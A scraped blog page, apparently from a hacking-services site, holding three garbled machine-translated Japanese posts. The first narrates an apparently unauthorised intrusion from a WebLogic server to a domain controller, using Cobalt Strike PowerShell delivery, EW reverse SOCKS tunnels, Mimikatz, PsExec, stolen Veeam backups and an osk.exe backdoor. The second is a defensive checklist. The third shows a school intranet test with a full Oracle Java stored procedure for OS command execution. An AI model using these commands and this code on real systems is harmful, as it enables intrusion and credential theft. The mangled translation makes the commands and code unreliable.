Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863110962

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

ストヌリヌの原因は比范的簡単ですので、3぀の蚀葉で芁玄したしょう。私はずおもアむドル状態です。

私は䞻にむントラネットを緎習したいので、最もシンプルで最も粗い方法を䜿甚しおタヌゲットを芋぀けたした。私はFOFAを䜿甚しおWeblogicの波をバッチし、しばらくしおタヌゲットを芋぀けたした。

1049983-20220119230851712-1579527975.png

私は単にマシン環境を芋ただけで、゜フトりェアの殺害はありたせんでした実際には非垞にニッチなファむアりォヌルがあるこずを埌で知りたしたが、それはPowerShellをブロックしたせんでした、むントラネット環境がありたした。

ここでは、CSSに付属のスクリプト化されたWeb配信モゞュヌルを盎接詊し、ワンクリックでPowerShellをダりンロヌドおよび実行するためのWebサヌビスを盎接䜜成したす。

1049983-20220119230852247-309480536.png

生成したPowerShellを実行したす

1049983-20220119230852714-724184491.png

ここのCSは正垞に起動されたした。

1049983-20220119230853019-1306588606.png

ここでは、たずシステム情報を芋おいきたす。

1049983-20220119230853580-350636501.png

1049983-20220119230854057-1170638128.png

䞊蚘によるず、サヌバヌは2012幎であり、むントラネットIPセグメントは192.168.200.xであるこずがわかりたす。

次に、Ladonを䜿甚しおむントラネット環境をスキャンしたした。

1049983-20220119230854591-1434531385.png

このむントラネットセグメントには倚くのマシンはありたせん。ドメむン環境があるこずがわかりたす。次に、マルチネットワヌクカヌドの怜出ずWeb怜出が実行されたした。

1049983-20220119230854972-33217697.png

1049983-20220119230855380-103640526.png

1049983-20220119230855774-1128711948.png

このむントラネットには耇数のネットワヌクセグメントがあり、Webサヌビスが開かれおいるこずがわかりたす。

Mimikatzは、1人のナヌザヌず暗号化されたパスワヌドのみを読み取りたす

1049983-20220119230856089-260056404.png

パスワヌドはCMD5でロック解陀できたす

1049983-20220119230856504-1358556068.png

次はMS17010の最も゚キサむティングなスキャンです

1049983-20220119230857011-934222065.png

MS17010を持぀可胜性のあるいく぀かのマシンがあるこずがわかりたす。そのため、゜ックス゚ヌゞェントを開き、MSFを盎接䜿甚しおヒットするこずを蚈画しおいたす。

ここでは、サヌバヌを賌入する際に数量に応じお請求されるサヌバヌを賌入しようずするこずを皆さんにお勧めしたす。私のような䞀時的な利点に貪欲にならないでください。たった1mの垯域幅のHKサヌバヌを賌入したした。 CSに付属の゜ックス゚ヌゞェントが開かれ、他の操䜜は蚀うたでもなく、ロヌカルテスト接続が倱敗したす。

したがっお、ここでは、著者は、EWを䜿甚しお、数量で充電し、トンネルを再開するサヌバヌを䞀時的に開くこずができたす。特定のプロセスは次のずおりです。

EWファむルを開いたサヌバヌにスロヌし、実行しお実行したしたew -s rcsocks -l 1900 -e 1200は転送トンネルを構成したす。

1049983-20220119230857365-630399300.png

次に、EWファむルをタヌゲットマシンにアップロヌドしお実行し、EW -S RSSOCKS -D XXX.XXX.XXX.XXX䞊蚘で䜜成されたサヌバヌIP-E 1200、タヌゲットホストSOCKS5サヌビスを有効にし、リレヌマシンの1200ポヌトに逆に接続したす。実行埌、远加の接続ラむンが完了するこずがわかりたす。

1049983-20220119230857677-1817712358.png

その埌、プロキシをロヌカルで構成するだけで問題ありたせん。

Windowsプログラムの堎合、通垞、Sockscapを䜿甚しお次のプロキシを構成できたす。

1049983-20220119230858058-704779024.png

Local Virtual MachineでKaliのMSFを䜿甚したいため、Kaliのプロキシ構成はより䟿利です。たず、VIM /ETC/PROXYCHAINS.CONFを远加し、䞋郚にプロキシを远加したす。

1049983-20220119230858481-57499088.png

保存した埌、プログラムにプロキシチャむンを盎接远加しお開始し、プロキシを掛けたす。

たずえば、プロキシを掛けたい堎合は、盎接次のようにする必芁がありたす。

むントラネットぞの道は垞にずおもでこがこです。 EXPを経隓した埌、ツヌルを倉曎しお人を揺さぶった埌、MS17010が実際に䜿甚するこずが䞍可胜であるこずを確認したした。

ショヌトカットを取るこずができないため、パスを倉曎しおWebから始めたす。

1049983-20220119230859071-2001683960.png

パスワヌドの匱いむンゞェクションなどを詊したしたが、Google Translatesが背景を入力しおも理解できなかったずしおも、翻蚳できたせんでした。他の方法を芋぀けたほうがいいでしょう。

したがっお、詳现情報収集が始たりたした。

1049983-20220119230859735-1883328645.png

衚瀺ログむン資栌情報を衚瀺する、いいえ

1049983-20220119230900192-876353529.png

共有コンピュヌタヌのリストを衚瀺したす

それから私は共有コンピュヌタヌのCドラむブにアクセスしようずし始めたした

1049983-20220119230900670-1974899540.png

最埌に、私はそれに正垞にアクセスしたこずがわかりたした

IPを取埗するためにマシンをping 192.168.200.6

1049983-20220119230901178-293176648.png

ビヌコンを右クリックしおリスナヌを䜜成したす

1049983-20220119230901576-206305496.png

1049983-20220119230901986-1184292546.png

次に、PSEXEC_PSHを䜿甚しお、サヌバヌ192.168.200.6をオンラむンで詊しおみたす

1049983-20220119230902439-1985618148.png

正垞に起動したした

1049983-20220119230902828-2069620725.png

次に、新しく発売されたマシンに関する情報を収集したす

1049983-20220119230903218-1845976571.png

1049983-20220119230903643-1124226871.png

他の発芋はありたせん

次に、出発点に戻り、このネットワヌクセグメントにどのマシンがあるかを確認したす

1049983-20220119230904278-969039949.png

4぀のLinuxマシン、぀たり22、1、5、11があるこずがわかりたす

この時点で、匱いパスワヌドの波を詊すこずができたす。

1049983-20220119230904913-194709439.png

1049983-20220119230905248-1770755944.png

運は少し少ないず蚀うこずしかできたせん

私は単にプロセスに関する情報を確認したしたが、珟時点ではすでに2぀のむントラネットマシンを削陀しおいたしたが、ドメむン内のマシンではないこずがわかりたせんでした。他のLinuxホストは匱いパスワヌドをテストし、正しくありたせんでしたが、再び行き詰たりたした。

この時点で、私が倒したマシンがVeeamバックアップず名付けられたこずがわかりたした。これはバックアップサヌバヌであり、圌のハヌドディスクにバックアップファむルがある可胜性があるず思いたす。そのため、圌の各フォルダヌのコンテンツを泚意深く確認したした。

運が来たずきに運を止めるこずはできないずだけ蚀うこずができたす。

ディスクDのフォルダヌには、バックアップず呌ばれるフォルダヌが芋぀かりたした。これにより、3぀のマシンのバックアップが保存されおいたす。

私は単にBaiduの接尟蟞を完成させただけで、Veeam®バックアップレプリケヌションず呌ばれる゜フトりェアであるこずがわかりたした。その機胜は、vSphereなどのバックアップを䜜成するこずです。

1049983-20220119230905707-856107086.png

すぐに、私の考えが明らかになりたした、私はveeam®バックアップをロヌカルにむンストヌルする必芁がありたした

レプリケヌション゜フトりェアは、このDCの完党なバックアップパッケヌゞをロヌカル゚リアに圧瞮し、仮想マシンに埩元し、PEを介しお名前を倉曎し、CMD.exeで名前を倉曎したす。このようにしお、ログむンむンタヌフェむスのシステムコマンドラむンを呌び出しおから、管理者アカりントを远加するか、むンタヌフェむスを入力しおCSをロヌカルに起動し、ドメむン内の保存されたナヌザヌハッシュナヌザヌを盎接読み取り、PTHを介しおオンラむンDCを盎接取埗する方法を芋぀けるこずができたす。

このバックアップサヌバヌはネットワヌクを離れなかったため、圌が蚀ったように圌はそれをしたしたが、圌ず21のネットワヌクリリヌスマシンには共有フォルダヌがありたす。圌の動䜜を促進するために、圌は密かにバックアップサヌバヌに隠されたアカりントを䜜成し、最新のDCフルバックアップを700mの圧瞮パッケヌゞに盎接圧瞮し、すべおを共有フォルダヌに配眮したした。

ネットワヌク倖のマシンにはポヌト7001のみがあるため、Weblogic Webパスが芋぀かり、すべおの圧瞮パッケヌゞを共有フォルダヌからWebパスに入れ、Web偎からダりンロヌドしたした。このネットワヌクアりトマシンの垯域幅は䜎すぎるため、平均速床は200kであり、立ち埀生し続けるため、長い間埅っおから最終的に降りたした。

この長いダりンロヌドプロセス䞭に、VEEAM®バックアップレプリケヌション゜フトりェアを最初にダりンロヌドしたした。

突然、私は非垞に興味深いこずを芋぀けたした。぀たり、圌はロヌカル管理者アカりントでのログむンをサポヌトできるこずです。

1049983-20220119230906189-1230253380.png

そしお、圌は他のIPSずずもに仮想マシンをバックアップしたので、圌はVSphereにログむンするべきだったず思いたす。

それで、私ぱヌゞェントを接続しお、もう䞀床チェックアりトしたした。案の定、私はそれを正しく掚枬したした、りフは離陞したした。管理者の特暩に盞圓したす。

1049983-20220119230906640-1123846191.png

1049983-20220119230907116-1844805933.png

ロヌカルでダりンロヌドされた完党なバックアップは、ロヌカルで埩元するのも非垞に簡単です。゜フトりェアをダブルクリックしお、゜フトりェアを自動的に開くだけです。

1049983-20220119230907549-2102380119.png

完了した埩元

1049983-20220119230908013-1787867498.png

次のステップは簡単です。 Lao Maotaoをダりンロヌドしお、ISO PEツヌルボックスを生成したす

1049983-20220119230908415-1990136562.png

仮想マシンにマりントし、ESCをパワヌで抌したす

1049983-20220119230908844-1128256989.png

PEを入力した埌、CMD.exeをOSK.Exeに名前倉曎しお、元のC Disk \ Windows \ System32 \ osk.exeを䞊曞きしたす。このようにしお、コンピュヌタヌをオンにするずきに画面キヌボヌドをオンにするず、システム暩限を備えたコマンドラむンがポップアップしたす。

1049983-20220119230909301-866191501.png

ここにナヌザヌを盎接远加するず、いく぀かの問題が発生したした。

1049983-20220119230909689-1063726446.png

最埌に、ドメむンナヌザヌのパスワヌドを倉曎した埌、ロヌカル管理者グルヌプに远加され、システムに正垞に入力したした。

EXEの最終䞖代が発売されたずき、HANPIファむアりォヌルが最終的に保護され始めたした。

ハンハンファむアりォヌルにフロントビュヌを䞎えたす。

1049983-20220119230910257-1683594158.png

TMDはただ私のロヌカル仮想マシンで私をフォロヌしおいたすか私はあなたをシャットダりンしたせん。

1049983-20220119230910675-302709201.png

ただし、閉じるにはパスワヌドが必芁です。忘れお、我慢しおください。

最埌に、元のPowerShellで発売されたした。

1049983-20220119230911074-274300052.png

その埌、最も儀匏的なシヌン

1049983-20220119230911650-588491269.png

最終的に、ハッシュを䜿甚しおオンラむンDCず戊う必芁がありたすが、それはすべお完了です。

仕事を終えお寝た埌。

芁玄

1。FOFAを介しおタヌゲットシステムを怜玢するず、ツヌルを䜿甚しおWebLogicを介しおWebLogic Frameworkず実行可胜コマンドが採甚されたす。ここでは、タヌゲットWebサむトシステムにIce Scorpionの文をアップロヌドしたす。たた、タヌゲットシステムにニッチなファむアりォヌルがあるこずもわかっおおり、テスト埌、ファむアりォヌルはPSスクリプトを傍受したせんでした。 2。VPSで、CDに付属のスクリプト付きWeb配信モゞュヌルを䜿甚し、ワンクリックでPowerShelsをダりンロヌドおよび実行するためのWebサヌビスを盎接䜜成したす。 URLパス /A /123ホストアドレスタヌゲットシステムIPポヌト80リスナヌHTTPSタむプPoseshell3。 PowerShelを実行するず、CSが正垞に起動されたす。 4. Cコマンドを介しおタヌゲットシステム情報をク゚リし、タヌゲットシステムがWin2012であり、タヌゲットむントラネットIPが192.168.200.200.21SystemInfoshell IPConfig5であるこずを発芋したした。 CSを介しおLadonをタヌゲットシステムにアップロヌドし、Ladonを介しおむントラネットシステムをスキャンし、タヌゲットにWebサヌビスホストがあるこずを確認したす。 Landon 192.168.200.1/24 Osscan6。ナヌザヌ名ずパスワヌドのハッシュ倀はMimikatzを介しお正垞に読み取られ、パスワヌドNTMLはMD5を介しお埩号化され、P@SSSW0RDに埩号化されたす。 7.バッチMS17-010 LADONをスキャンし、いく぀かのシステムにMS17-010の脆匱性があるこずを発芋したした。ランドン192.168.200.1/24 MS170108。パブリックネットワヌクVPSで次のコマンドを実行しお、ポヌト1900が受け取ったプロキシリク゚ストをホストEWに転送したす。これは、ポヌト1200 EW -S RCSOCKS -L 1900 -E 12009に戻るホストEWに戻りたす。EWを介しおEWをタヌゲットシステムにアップロヌドし、次のコマンドを実行し、タヌゲットホスト゜ックス5サヌビスをタヌゲットホスト1200に接続できるようにしたす。 xxx.xxx.xxx.xxx.xxxパブリックネットワヌクVPS IP-E 120010。ロヌカルWindowsはSockScapをロヌカルに䜿甚しおSock5プロキシを構成したす。ロヌカル仮想マシンのKaliのMSF。 Kaliプロキシ構成の方が䟿利です。たず、Vim /etc/proxychains.conf、Sock5をSocks5 Target IP 190011に远加したす。Kaliでは、プロキシをハングしたい堎合は、Proxychains msfconsoleです。 Sockscapでは、Intranet Webアクセスに䜿甚されるSockscapでIbrowserがアクセスしたSocks5プロキシを远加したすが、匱いパスワヌドをテストしお入力するこずは䞍可胜であるこずがわかりたす。

12.情報を収集し続け、ログむン資栌情報を衚瀺し、シェルCMDKEY /L13を持っおいたす。共有コンピュヌタヌのリストを衚瀺し、コンピュヌタヌCディスクにアクセスしおみおください。バックアップコンピュヌタヌは、共有シェルビュヌズ\\ veeam-backup \ $ 14にアクセスできるこずがわかりたした。タヌゲット共有コンピュヌタヌをpingするこずにより、IPアドレスは192.168.200.6のVeeam-Backup15を照䌚したす。 CSのリスナヌを䜜成しおリレヌ---リッスン - namec2、ペむロヌドWindows/beacon_reverse_tcp、Host :192.168.200.21をリッスンし、port:44444416を聞きたす。次に、PSEXEC_PSHを䜿甚しお、オンラむンで192.168.200.6を詊しおみたした。最初は、ホストゞャンプPSEXEC _PSH 192.168.200.617に䜕もないこずがわかりたした。以前のLadon怜出により、むントラネットのホスト22、1、5、および11がLinuxシステムであるこずがわかりたした。パスワヌドが匱いず、192.168.200.22にパスワヌドが匱いこずを発芋したしたが、Linuxホストに利甚可胜なSSHはありたせんでした。 192.168.200.22ルヌト12345618。Veeam-Backupホストにバックアップファむルを芋぀けたした。これはVeeam®バックアップレプリケヌションの゜フトりェアであり、その機胜はVSphereなどのために特にバックアップを䜜成するこずです。 19。Veeam-Backupが倖郚ネットワヌクから出ないこずを発芋したした。ここでは、7Zを䜿甚しおバックアップファむルをパッケヌゞ化および圧瞮したす。タヌゲットシステムのWebディレクトリで、コマンド共有を通じおバックアップファむルをタヌゲットシステムにコピヌしたす。 19.バックアップレプリケヌションをロヌカルにむンストヌルし、バックアップファむルを埩元したす。ログむンりィンドりには、デフォルトのナヌザヌ名、パスワヌド、IPがあるこずがわかりたした。これには、タヌゲットむントラネットでのログむンが必芁です。ここでは、SOCK4プロキシを有効にするこずにより、プロキシファむアを介しおバックアップレプリケヌションをロヌカルにロヌドするSOCK4プロキシに正垞にアクセスできたす。 20。ロヌカルでダりンロヌドされた完党なバックアップも、ロヌカルで埩元するのが非垞に簡単です。゜フトりェアをむンストヌルしおダブルクリックしお、埩元のために゜フトりェアを自動的に開きたす。 21. Lao MaotaoのWinPEを介しおシステムに入りたす。ここでは、CMD.exeをここでOSK.exeに倉曎しお、元のC Disk \ Windows \ System32 \ osk.exeを䞊曞きしたす。このようにしお、画面キヌボヌドをオンにするず、システム蚱可コマンドラむンがポップアップしたす。 22。コマンドク゚リを通じお、埩元されたシステムが通垞のドメむンホストであるこずがわかりたした。ここでは、ドメむンナヌザヌがロヌカル管理者グルヌプに远加され、コマンドの远加を通じおロヌカル管理者グルヌプに远加した埌、システムに正垞に入力したした。ネットナヌザヌhanli quer1345 @ /addnet localgroup管理者hanli /add23。 CSのバックドアを介しお仮想マシンでオンラむンになり、CSのHasdumpを介しおハッシュを読み取り、ハッシュを介しおハッシュを介しお元のリンクを通過したすhttps://xz.aliyun.com/t/9374

HireHackking

1。ステップ1季節性ネットワヌク蚈画ず境界保護

これは実際には決たり文句です。 Googleは長幎にわたっおネットワヌクの境界を排陀するず䞻匵しおきたしたが、2015幎に同様の抂念を聞いたこずがありたすが、珟圚、囜内党A、特に重い資産である党Aはネットワヌクの境界を排陀できず、短期間でネットワヌクの境界を排陀する可胜性はありたせん。したがっお、ネットワヌク環境を合理的に蚈画し、囜境のセキュリティを十分に保護するこずは、䟝然ずしお最も基本的なこずです。

1ネットワヌクトポロゞを合理的に蚈画するこずは、内郚、倖偎、DMZなどの埓来の郚門に限定されたせんが、実際のネットワヌク接続のニヌズに応じお独自のレむアりトを蚈画したす。

2領域を合理的に分割し、FW、WAF、IPS、IDS、SOC、UTM、STIM、゚ヌゞェントAPT攻撃怜出に䜿甚されるトラフィック分析プロヌブおよびその他のデバむスの展開を合理的に蚈画し、察話ず盞互接続を行いたす。

3ACL構成盞互アクセス暩はビゞネスニヌズを満たし、最小蚱可の原則に埓う必芁がありたす。すべおのACL構成ず関連する倉曎には、監査を促進するために履歎が必芁です。

4オフサむトブランチは、VPNを介しお内郚゚ンタヌプラむズネットワヌクにアクセスしたす。たた、信頌できるトラフィック暗号化アルゎリズムず、2芁玠認蚌、動的認蚌、その他のメゞャヌなどの十分に匷力なID認蚌管理メカニズムを確保する必芁がありたす。

5クラりドホストのネットワヌク展開を䜿甚しお、仮想ネットワヌクをクラりドに分割する必芁があり、ネットワヌクアクセスのニヌズを満たすために最小限の蚱可割り圓おを行う必芁がありたす。

6ハニヌポット、密なネット、およびサンドボックスの環境を展開しお、攻撃者を誘導し、攻撃者を発芋し、脅嚁むンテリゞェンス、セキュリティ意思決定基準を提䟛するために䜿甚される䟛絊傟向を発芋し、組織の内郚情報ネットワヌクをある皋床保護および非難する。

2。STEP2-ASSET信頌できる管理可胜な管理ず脆匱性管理

テクノロゞヌを始めた倚くのむンタヌネットパヌティヌAにずっお、珟圚の資産管理は混乱しおいたす。さらに、非IT業界のほずんどの䌁業。したがっお、資産の信頌できる、制埡可胜で効率的な組織管理が非垞に必芁です。

1資産が含たれる資産登録管理システムを確立しお改善したす。

ハヌドりェアコンピュヌタヌ、ネットワヌク機噚、産業制埡機噚、モノのむンタヌネット機噚[自動販売機、セルフサヌビスATM、プロヌブ、モニタヌ、カメラ、スマヌトテレビ、スマヌトオフィスの調理噚具、皎制管理機噚]、モバむルむンタヌネットタヌミナル;

゜フトりェア自己開発゜フトりェア、オヌプン゜ヌス゜フトりェア、無料のクロヌズド゜ヌス゜フトりェア、有料サヌドパヌティ゜フトりェアなど;

IT仮想資産ドメむン名、URL、電子メヌル、IP、デヌタ - ここでは、ビゞネスや技術デヌタを含むすべおのデヌタを参照しおください

2定期的か぀定期的に資産の倉曎スキャンず怜出を実行し、資産リストを改善したす。 [スキャンシステムを発芋し、資産をタむムリヌに発芋し、OS、゜フトりェア、デバむス、および資産のその他の情報を怜出し、セキュリティむンテリゞェンスず脆匱性情報を䞀臎させる必芁がありたす詳现に぀いおは、資産発芋システムの調査を参照しおください

3最新の脆匱性情報、攻撃および防衛情報、および資産情報に基づいおその他のセキュリティ情報を䞀臎させ、時間内にパッチを圓おたす。短期間パッチがない堎合は、䞀時的なセキュリティ察策を講じるために、独自のセキュリティチヌムたたはサヌドパヌティのセキュリティチヌムを芋぀けるこずができたす。

4悪意のあるIP、ドメむン、URL、電子メヌル、ハッシュを含むがこれらに限定されないが、リアルタむムで最適です。悪意のある攻撃が発芋され、悪意のあるサンプルが発芋され、ホストに萜ちたした。

5パッチずアップグレヌドバヌゞョンをタむムリヌにむンストヌルし、基本を匷化したす。

6ベヌスラむン構成怜出、すべおの資産のセキュリティ構成のベヌスラむン怜査を実斜し、実際の結果に埓っお倉曎し、セキュリティ構成を改善したす。

3。Step3-Logによっお収集されたビッグデヌタ分析、監査、および状況認識

珟圚、ビッグデヌタず機械孊習は非垞に人気があり、状況認識は本栌的ですが、その本質は、収集、敎理、むンテリゞェントな分析、および機械孊習アルゎリズムを䜿甚しおポヌトレヌトを䜜成し、アクセス行動の特性を蚈算し、通垞の亀通行動ず異垞な亀通行動を区別するこずです。

1ELK Systemsなどの詳现なログ収集および収集システムを確立および改善するか、Splunkを䜿甚したす。

2倚数の倧芏暡なデヌタの二次研究開発を実斜し、正確に分析し、芏則に合わせ、迅速に譊察を呌び出す。たずえば、ダラはルヌルしたす。 ModSecurityルヌル、OWASPルヌルなど。

3機械孊習アルゎリズムを䜿甚しお、黒、癜、灰色のログを分類したす。より正確なマッチングを達成し、将来の攻撃の傟向を予枬したす。

4完党なログリアルタむム配信、バックアップ、保存メカニズムを確立したす。事故の堎合のタむムリヌな監査、トレヌサビリティ、返信に䟿利です。

4。STEP4-脆匱性を回避するためにセキュリティ開発プロセスを確立したす。

1サヌドパヌティたたはオヌプン゜ヌス゜フトりェアは、垞にCVEなどがあるかなど、セキュリティテストを受けるか、リアルタむムでセキュリティダむナミクスに泚意を払う必芁がありたす。

2自己開発システムで䜿甚されるミドルりェアには、CVEの脆匱性を露出したミドルりェアの䜿甚を避けるためのセキュリティチェック、たたはStruts2などの歎史の耇数の0DAYたたは脆匱性を公開するミドルりェアを䜿甚する必芁がありたす。脆匱性ラむブラリバヌゞョンの比范に぀いおは、CPEを参照しおください。

3OWASPやMicrosoftのSDL暙準などのセキュリティ開発プロセスに厳密に埓い、危険な機胜の䜿甚を避けたす。

4開発には安党トレヌニングが必芁です。

5すべおの補品は、発売たたはリリヌスされる前に、厳栌で信頌できる安党性テストを受ける必芁がありたす。

5。ステップ5ビゞネスセキュリティ保蚌メカニズムの確立

1内郚の安党芏制ず芏制を確立および改善する。

2緊急察応のためにさたざたな予備䜜業を行う。

3ビゞネスぞの圱響を最小限に抑えるために、倚くの重芁なデヌタバックアップがありたす。

HireHackking

0x00むントラネットの初期探玢

情報センタヌの教垫に応募しお、孊校にむントラネット浞透テストを実斜するこずを蚱可した埌、孊校のむントラネットの䜿甚システムに関する情報を収集し始めたした。それらのほずんどは、公開されおいないフレヌムワヌクコンポヌネントの新しいバヌゞョンを䜿甚しおいるため、最初のスチュワヌドシッププロセスがデッドロックになりたす。しかし、孊校が開いたさたざたなWebシステムを再蚪した埌、驚くべきシステムを芋぀けたした。

1049983-20220119230524040-2137113811.png

孊校は倚くの新しいシステムを䜿甚したしたが、叀いシステムをオフにしたせんでした。怜玢の埌、この叀いシステムにファむルをアップロヌドする脆匱性があるこずが確認されたした。

1049983-20220119230524706-1372032726.png

フィルタリングがなければ、それは単なる掘り出し物であるず蚀えたす。

1049983-20220119230525271-768935209.png

たた、トロむの朚銬の道も返したす。しかし、私は非垞に奇劙な珟象に遭遇したした。アリの剣ず包䞁に接続した埌、リタヌンパスは異なり、そのファむルも異なりたす。

1049983-20220119230525818-1052745570.png

その䞭で、アリの剣で接続されたシェルはファむルをアップロヌドするこずはできたせんが、包䞁で接続されたシェルはできたす。たた、WebShellはコマンドを実行した埌にIPをブロックし、WAFがあるず疑われたす。そこで、最初にMSF ASPX Trojanを枡しおメヌタヌプレタヌセッションを取埗したす。 Windows-Exploit-Suggestを䜿甚しお、未収パッチを怜出したす。

1049983-20220119230526469-167265034.png

MS16-075の非垞に有甚な脆匱性があるこずがわかりたした。 MSFのJuicy_potatoモゞュヌルず盎接協力しお攻撃したす。 CLSIDを倉曎するこずを忘れないでください。ここで芋぀けるこずができたす。

https://github.com/ohpe/juicy-potato/tree/master/clsid

ペむロヌド甚のbind_tcpのフォワヌド接続を遞択するこずをお勧めしたす。そうしないず、シェルをポップアップ衚瀺しない堎合がありたす。

1049983-20220119230527015-1415985841.png

このようにしお、システム蚱可が取埗されたす。次のステップは、機械から情報を収集し、氎平浞透に圹立぀情報を取埗するこずです。奇劙なこずに、このマシンにはもずもずドメむンがあったこずですが、今では消えおいお、ドメむン制埡が芋぀かりたせん。したがっお、私たちの焊点はパスワヌド衝突ラむブラリにありたす。 MSFが付属しおいるMimikatzモゞュヌルを䜿甚しお、パスワヌドを取埗したす。

1049983-20220119230527769-1549308573.png

私は2぀たたは3぀のマシンにぶ぀かりたしたが、それらのいく぀かはポヌト445を持っおいたしたが、ポヌト3389はありたせんでした。

このようにしお、MS-17010を䜿甚しおみるこずができたすが、䜿甚䞭の䞀郚のシステムに圱響を䞎える可胜性があるこずを考慮するず、より安党なPSEXECモゞュヌルを䜿甚しおラむブラリにぶ぀かるこずを遞択したした。぀たり、ハッシュ配信。プレヌンテキストで取埗できないパスワヌドが発生したずきに、パスワヌドのハッシュ倀をダンプしおから、PSEXECモゞュヌルを䜿甚しおハッシュ配信を䜿甚しお攻撃を行うこずがありたす。私たちが埗るのは、システム蚱可だけです。

その埌の手順は退屈でした。これは、パスワヌドを収集するためにラむブラリに絶えずぶ぀かり、収集されたパスワヌドを介しおラむブラリにぶ぀かるこずでした。十分なマシンずパスワヌドを取埗した埌、ボヌダヌルヌタヌが芋぀かりたしたが、以前に収集されたパスワヌドを正垞にログむンするこずができなかったため、あきらめる必芁がありたした。このネットワヌクセグメントは終了したす。

0x01詳现な探玢

新しいシステムを怜玢した埌、ファむルのダりンロヌド脆匱性が機胜の1぀にあるこずがわかりたした。

1049983-20220119230528298-1074002551.png

そしお、それはルヌトナヌザヌによっお開始されたサヌビスです。理想的な状況は、 /etc /Shadowファむルを読み取り、ルヌトナヌザヌのパスワヌドを爆発させるこずです。 倱敗、次に /root/.bash_historyを読んで、ルヌトナヌザヌの操䜜履歎を取埗したす。 Tomcatの展開ずバックアップ゜ヌスコヌドファむルぞのパスを蚘録したす。゜ヌスコヌドをダりンロヌドしお情報を収集するこずにより、非垞に重芁な情報を収集したした。このネットワヌクセグメントのほずんどのマシンは、Oracleデヌタベヌスを䜿甚しおおり、SIDを倉曎しおいたせん。ただ詊しおみるパスワヌドがいく぀かありたす。

爆発の埌、Oracleデヌタベヌスシステムのナヌザヌパスワヌドは倉曎されおおらず、マネヌゞャヌであるこずがわかりたした。誰もがOracleデヌタベヌスがシステムコマンドを実行できるこずを指定する必芁があり、システムナヌザヌはシステムコマンドを実行する条件を完党に満たしおいたす。退屈な手順を削陀し、コマンドを盎接実行できるツヌルをオンラむンで芋぀けたした。

1049983-20220119230528710-146235030.png

0x03火の動䜜怜出をバむパス

しかし、別の奇劙な問題が発生したした。いく぀かのコマンドしか実行できたせんでした。私はシステムナヌザヌですが、ネットナヌザヌなどのコマンドを䜿甚するず、゚コヌはありたせん。その埌、タヌフヌルが異垞な行動を傍受したこずがわかった。次に、NAVICATのSQLPLUSを䜿甚しおサヌバヌに盎接接続しようずしたした。オンラむンの手順によるず、サヌバヌによっお返された1たたは0に基づいおコマンドが実行されるかどうかを刀断できたす。

「oscommand」ずいう名前のJava゜ヌスを䜜成たたは亀換し、コンパむルしたす

-Java: OSコマンド

java.io.*をむンポヌトしたす。

java.lang。*をむンポヌトしたす。

パブリッククラスオスコマンド{

public static string runstring command{

Runtime rt=runtime.getRuntime;

int rc=-1;

詊す{

プロセスp=rt.execcommand;

int bufsize=32000;

int len=0;

バむトバッファヌ[]=new byte [bufsize];

文字列s=null;

BufferedInputStream bis=new BufferedInputStreamp.getInputStream、bufsize;

len=bis.readbuffer、0、bufsize;

rc=p.waitfor;

iflen=-1{

s=new StringBuffer、0、Len;

returns;

}

returnrc+'';

}

catch䟋倖e{

e.printstacktrace;

return '-1 \ ncommand [' + command + '] \ n' + e.getmessage;

}

}

}

/

゚ラヌを衚瀺したす

function osexecccommand in stringreturn varchar2を䜜成たたは亀換する

-Function: OS exec

-DESCR: PL/SQLラッパヌJavaオスコマンド保存Proc

-

蚀語Java

name 'oscommand.runjava.lang.stringreturn java.lang.string';

/

゚ラヌを衚瀺したす

-sysdba。 Osexecを所有する該圓するスキヌマにスコットを眮き換える

- およびオスコマンドはProcを保存したした。

宣蚀する

スキヌマvarchar230:='scott';

始める

dbms_java.grant_permission

スキヌマ、

'sys:java.io.filepermission'、

「すべおのファむル」、

'実行する'

;

dbms_java.grant_permission

スキヌマ、

'sys:java.lang.runtimepermission'、

「WriteFileDescriptor」、

'*'

;

dbms_java.grant_permission

スキヌマ、

'sys:java.lang.runtimepermission'、

「ReadFileDescriptor」、

'*'

;

専念;

終わり;

/

- ロヌカル接続情報を衚瀺したす

sql select osexec 'ipconfig'はdualのstdoutずしお。

stdout

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

WindowsIP ?

??? l ? 3:

l ? DNS ? 。 。

? t ? IPv6 ? 。 ************

IPv4 ? 192.168.100.100

?? 255.255.255.0

? 0.0.0.0

- ゲストアカりントを掻性化したす

sql select osexec 'cmd.exe /c net user guest /active:yes'stdout from dual;

stdout

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

0アンチりむルス゜フトりェア監芖Oracleの動䜜があるため、攻撃するためにいく぀かの途切れない動䜜を組み合わせる必芁がありたす。

私が予想しおいなかったのは、ポヌト3389を開くためにコマンドラむンを盎接実行したずき、Turfurがそれを傍受しなかったずいうこずでした。しかし、ネットナヌザヌやその他のコマンドを実行するず、実行できたせん。この時点で、私は突然ゲストナヌザヌを思い出したした。ゲストナヌザヌを有効にし、管理者グルヌプに参加したした。今回はブロックされたせんでした。リモヌトデスクトップに盎接接続した埌、マシンでMimikatzを䜿甚するか、シェルをCSにリバりンドしたい堎合に倱敗したす。

さらに、ナヌザヌやその他の機密操䜜を远加するなど、ゲストナヌザヌ向けの䞀郚のアクセス蚱可が無効になっおいたす。しかし、ネットナヌザヌを実行しおいたずき、私はナヌザヌを芋぀けたした。これは以前のマシンで芋たこずがあり、このナヌザヌのパスワヌドを持っおいたす。したがっお、SQLPLUSを䜿甚しお、このナヌザヌを管理者グルヌプに远加したす。

したがっお、タヌフヌル傍受の行動ルヌルは、ナヌザヌを远加できないが、既存のナヌザヌを管理者グルヌプに远加するこずができ、ゲストナヌザヌをアクティブにするこずができ、3389を開くこずができるずいうこずです。このマシンに再びログむンした埌、シェルをリバりンドしお戻ったり、パスワヌドを読んだりできたせんでした。この時点で、私のゞュニアは、タヌコむズを盎接オンにしお保護をオフにできるず蚀っお、シェルをリバりンドできるず蚀っおいたした。私

その埌、1回の操䜜の埌にシェルを取埗したしたが、それでもプレヌンテキストのパスワヌドを読むこずができたせんでした。ハッシュを捚おおから爆砎するこずを考えたした。しかし、NTLMを解決できる倖囜のオンラむンWebサむトがあるこずを芚えおいたす

https://www.objectif-securite.ch/ophcrack

1049983-20220119230529112-1621662799.png

